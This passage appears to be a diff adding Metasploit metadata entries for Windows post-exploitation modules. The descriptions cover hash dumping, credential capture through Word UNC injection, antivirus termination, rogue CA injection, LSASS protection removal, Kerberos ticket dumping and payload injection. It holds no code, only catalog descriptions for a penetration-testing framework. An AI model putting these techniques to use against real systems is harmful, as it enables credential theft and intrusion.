the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/smart_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/smart_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/tcpnetstat": { + "name": "Windows Gather TCP Netstat", + "fullname": "post/windows/gather/tcpnetstat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module lists current TCP sessions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/tcpnetstat.rb", + "is_install_path": true, + "ref_name": "windows/gather/tcpnetstat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/usb_history": { + "name": "Windows Gather USB Drive History", + "fullname": "post/windows/gather/usb_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "nebulus" + ], + "description": "This module will enumerate USB Drive history on a target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/usb_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/usb_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/win_privs": { + "name": "Windows Gather Privileges Enumeration", + "fullname": "post/windows/gather/win_privs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Merlyn Cousins " + ], + "description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/win_privs.rb", + "is_install_path": true, + "ref_name": "windows/gather/win_privs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/wmic_command": { + "name": "Windows Gather Run WMIC Commands", + "fullname": "post/windows/gather/wmic_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module executes WMIC commands on the specified host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 00:25:13 +0000", + "path": "/modules/post/windows/gather/wmic_command.rb", + "is_install_path": true, + "ref_name": "windows/gather/wmic_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/word_unc_injector": { + "name": "Windows Gather Microsoft Office Word UNC Path Injector", + "fullname": "post/windows/gather/word_unc_injector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "SphaZ " + ], + "description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", + "references": [ + "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/word_unc_injector.rb", + "is_install_path": true, + "ref_name": "windows/gather/word_unc_injector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/add_user": { + "name": "Windows Manage Add User to the Domain and/or to a Domain Group", + "fullname": "post/windows/manage/add_user", + "aliases": [ + "post/windows/manage/add_user_domain" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/add_user.rb", + "is_install_path": true, + "ref_name": "windows/manage/add_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/archmigrate": { + "name": "Architecture Migrate", + "fullname": "post/windows/manage/archmigrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/archmigrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/archmigrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/change_password": { + "name": "Windows Manage Change Password", + "fullname": "post/windows/manage/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/change_password.rb", + "is_install_path": true, + "ref_name": "windows/manage/change_password", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/clone_proxy_settings": { + "name": "Windows Manage Proxy Setting Cloner", + "fullname": "post/windows/manage/clone_proxy_settings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/clone_proxy_settings.rb", + "is_install_path": true, + "ref_name": "windows/manage/clone_proxy_settings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/delete_user": { + "name": "Windows Manage Local User Account Deletion", + "fullname": "post/windows/manage/delete_user", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "chao-mu" + ], + "description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/delete_user.rb", + "is_install_path": true, + "ref_name": "windows/manage/delete_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/dell_memory_protect": { + "name": "Dell DBUtilDrv2.sys Memory Protection Modifier", + "fullname": "post/windows/manage/dell_memory_protect", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "post", + "author": [ + "SentinelLabs", + "Kasif Dekel", + "Red Cursor", + "Jacob Baines" + ], + "description": "The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition\n that allows an attacker to read and write arbitrary kernel-mode memory. This module\n installs the provided driver, enables or disables LSA protection on the provided\n PID, and then removes the driver. This would allow, for example, dumping LSASS memory\n even when secureboot is enabled or preventing antivirus from accessing the memory of\n a chosen PID.\n\n The affected drivers are not distributed with Metasploit. You will truly need to\n Bring Your Own (Dell) Driver.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "URL-https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", + "URL-https://itm4n.github.io/lsass-runasppl/", + "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "URL-https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93", + "URL-https://github.com/RedCursorSecurityConsulting/PPLKiller", + "URL-https://github.com/jbaines-r7/dellicious" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/post/windows/manage/dell_memory_protect.rb", + "is_install_path": true, + "ref_name": "windows/manage/dell_memory_protect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/download_exec": { + "name": "Windows Manage Download and/or Execute", + "fullname": "post/windows/manage/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "RageLtMan " + ], + "description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/download_exec.rb", + "is_install_path": true, + "ref_name": "windows/manage/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/driver_loader": { + "name": "Windows Manage Driver Loader", + "fullname": "post/windows/manage/driver_loader", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/driver_loader.rb", + "is_install_path": true, + "ref_name": "windows/manage/driver_loader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/enable_rdp": { + "name": "Windows Manage Enable Remote Desktop", + "fullname": "post/windows/manage/enable_rdp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module enables the Remote Desktop Service (RDP). It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/enable_rdp.rb", + "is_install_path": true, + "ref_name": "windows/manage/enable_rdp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/enable_support_account": { + "name": "Windows Manage Trojanize Support Account", + "fullname": "post/windows/manage/enable_support_account", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "salcho " + ], + "description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It will enable\n the account for remote access as the administrator user while\n taking advantage of some weird behavior in lusrmgr.msc. It will\n check if sufficient privileges are available for registry operations,\n otherwise it exits.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/enable_support_account.rb", + "is_install_path": true, + "ref_name": "windows/manage/enable_support_account", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/exec_powershell": { + "name": "Windows PowerShell Execution Post Module", + "fullname": "post/windows/manage/exec_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nicholas Nam (nick ", + "RageLtMan " + ], + "description": "This module will execute a PowerShell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/exec_powershell.rb", + "is_install_path": true, + "ref_name": "windows/manage/exec_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/execute_dotnet_assembly": { + "name": "Execute .net Assembly (x64 only)", + "fullname": "post/windows/manage/execute_dotnet_assembly", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "b4rtik" + ], + "description": "This module executes a .NET assembly in memory. It\n reflectively loads a dll that will host CLR, then it copies\n the assembly to be executed into memory. Credits for AMSI\n bypass to Rastamouse (@_RastaMouse)", + "references": [ + "URL-https://b4rtik.github.io/posts/execute-assembly-via-meterpreter-session/" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb", + "is_install_path": true, + "ref_name": "windows/manage/execute_dotnet_assembly", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/forward_pageant": { + "name": "Forward SSH Agent Requests To Remote Pageant", + "fullname": "post/windows/manage/forward_pageant", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan ", + "Ben Campbell " + ], + "description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/post/windows/manage/forward_pageant.rb", + "is_install_path": true, + "ref_name": "windows/manage/forward_pageant", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/hashcarve": { + "name": "Windows Local User Account Hash Carver", + "fullname": "post/windows/manage/hashcarve", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "p3nt4" + ], + "description": "This module will change a local user's password directly in the registry.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/hashcarve.rb", + "is_install_path": true, + "ref_name": "windows/manage/hashcarve", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/ie_proxypac": { + "name": "Windows Manage Proxy PAC File", + "fullname": "post/windows/manage/ie_proxypac", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.", + "references": [ + "URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1", + "URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/ie_proxypac.rb", + "is_install_path": true, + "ref_name": "windows/manage/ie_proxypac", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/inject_ca": { + "name": "Windows Manage Certificate Authority Injection", + "fullname": "post/windows/manage/inject_ca", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/inject_ca.rb", + "is_install_path": true, + "ref_name": "windows/manage/inject_ca", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/inject_host": { + "name": "Windows Manage Hosts File Injection", + "fullname": "post/windows/manage/inject_host", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/inject_host.rb", + "is_install_path": true, + "ref_name": "windows/manage/inject_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/install_python": { + "name": "Install Python for Windows", + "fullname": "post/windows/manage/install_python", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Michael Long " + ], + "description": "This module places an embeddable Python3 distribution onto the target file system,\n granting pentesters access to a lightweight Python interpreter.\n This module does not require administrative privileges or user interaction with\n installation prompts.", + "references": [ + "URL-https://docs.python.org/3/using/windows.html#windows-embeddable", + "URL-https://attack.mitre.org/techniques/T1064/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/manage/install_python.rb", + "is_install_path": true, + "ref_name": "windows/manage/install_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/install_ssh": { + "name": "Install OpenSSH for Windows", + "fullname": "post/windows/manage/install_ssh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Michael Long " + ], + "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.", + "references": [ + "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview", + "URL-https://github.com/PowerShell/openssh-portable" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/install_ssh.rb", + "is_install_path": true, + "ref_name": "windows/manage/install_ssh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/kerberos_tickets": { + "name": "Kerberos Ticket Management", + "fullname": "post/windows/manage/kerberos_tickets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Will Schroeder", + "Spencer McIntyre" + ], + "description": "Manage kerberos tickets on a compromised host.", + "references": [ + "URL-https://github.com/GhostPack/Rubeus", + "URL-https://github.com/wavvs/nanorobeus" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/manage/kerberos_tickets.rb", + "is_install_path": true, + "ref_name": "windows/manage/kerberos_tickets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "DUMP_TICKETS", + "description": "Dump the Kerberos tickets" + }, + { + "name": "ENUM_LUIDS", + "description": "Enumerate session logon LUIDs" + }, + { + "name": "SHOW_LUID", + "description": "Show the current LUID" + } + ] + }, + "post_windows/manage/killav": { + "name": "Windows Post Kill Antivirus and Hips", + "fullname": "post/windows/manage/killav", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Marc-Andre Meloche (MadmanTM)", + "Nikhil Mittal (Samratashok)", + "Jerome Athias", + "OJ Reeves" + ], + "description": "This module attempts to locate and terminate any processes that are identified\n as being Antivirus or Host-based IPS related.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/killav.rb", + "is_install_path": true, + "ref_name": "windows/manage/killav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/make_token": { + "name": "Make Token Command", + "fullname": "post/windows/manage/make_token", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Daniel López Jiménez (attl4s)", + "Simone Salucci (saim1z)" + ], + "description": "In its default configuration, this module creates a new network security context with the specified\n logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and\n a new logon session is created and linked to that token. The token is then impersonated to acquire\n the new network security context. This module has no effect on local actions - only on remote ones\n (where the specified credential material will be used). This module does not validate the credentials\n specified.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-06 09:07:57 +0000", + "path": "/modules/post/windows/manage/make_token.rb", + "is_install_path": true, + "ref_name": "windows/manage/make_token", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "make_token", + "maketoken" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/migrate": { + "name": "Windows Manage Process Migration", + "fullname": "post/windows/manage/migrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "phra " + ], + "description": "This module will migrate a Meterpreter session from one process\n to another. A given process PID to migrate to or the module can spawn one and\n migrate to that newly spawned process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/migrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/migrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/mssql_local_auth_bypass": { + "name": "Windows Manage Local Microsoft SQL Server Authorization Bypass", + "fullname": "post/windows/manage/mssql_local_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Scott Sutherland " + ], + "description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2k-2k8, LocalSystem\n is assigned syadmin privileges. Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating to the SQL Server process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", + "is_install_path": true, + "ref_name": "windows/manage/mssql_local_auth_bypass", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/multi_meterpreter_inject": { + "name": "Windows Manage Inject in Memory Multiple Payloads", + "fullname": "post/windows/manage/multi_meterpreter_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "David Kennedy \"ReL1K\" " + ], + "description": "This module will inject into several processes a given\n payload and connect to a given list of IP addresses.\n The module works with a given lists of IP addresses and\n process IDs if no PID is given it will start the given\n process in the advanced options and inject the selected\n payload into the memory of the created module.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/multi_meterpreter_inject", + "check": false, + 